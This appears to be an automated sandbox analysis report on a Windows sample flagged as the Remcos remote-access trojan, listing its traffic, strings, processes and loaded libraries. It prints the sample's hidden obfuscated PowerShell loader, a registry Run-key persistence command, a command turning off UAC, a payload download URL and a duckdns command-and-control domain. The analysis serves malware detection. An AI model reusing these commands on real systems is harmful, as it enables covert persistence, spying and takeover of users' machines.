          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49726 -> 142.250.184.238:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: a458386d9.duckdns.org
          Source: svchost.exe, 0000001A.00000002.2506873908.0000014BA0400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.26.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://s.symcd.com06
          Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: Amcache.hve.33.drString found in binary or memory: http://upx.sf.net
          Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000A.00000002.2003170907.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: powershell.exe, 0000000A.00000002.2009656049.0000000008179000.00000004.00000020.00020000.00000000.sdmp, anziOUzZJs.exe, Partivarerne.scr.10.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com//
          Source: powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2010246217.0000000008330000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I
          Source: powershell.exe, 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: powershell.exe, 0000000A.00000002.2002199771.0000000002BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1$T
          Source: powershell.exe, 0000000A.00000002.2007087274.000000000719E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2009656049.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2007087274.000000000715C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12MtvGq1mcjx6u74x3n7vw_RWb57_mB-I&export=download
          Source: edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000001A.00000003.1875644629.0000014BA02D0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr, edb.log.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: powershell.exe, 0000000A.00000002.2003170907.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000A.00000002.2005526525.0000000005A3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: qmgr.db.26.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49729 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Installs a global keyboard hook
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405050

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0000000A.00000002.2009656049.0000000008137000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2007087274.00000000070D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2002199771.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Partivarerne.scrJump to dropped file
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_004063440_2_00406344
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_0040488F0_2_0040488F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02C9EFF810_2_02C9EFF8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02C9F8C810_2_02C9F8C8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_02C9ECB010_2_02C9ECB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0720BC1810_2_0720BC18
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll 5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: anziOUzZJs.exeStatic PE information: invalid certificate
          Source: anziOUzZJs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/34@6/3
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040431C
          Source: C:\Users\user\Desktop\anziOUzZJs.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile created: C:\Users\user\Desktop\Flyverdragter.lnkJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7800
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsd1C81.tmpJump to behavior
          Source: anziOUzZJs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: anziOUzZJs.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\anziOUzZJs.exeFile read: C:\Users\user\Desktop\anziOUzZJs.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\anziOUzZJs.exe "C:\Users\user\Desktop\anziOUzZJs.exe"
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 3448
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 2384
          Source: C:\Users\user\Desktop\anziOUzZJs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\anziOUzZJs.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
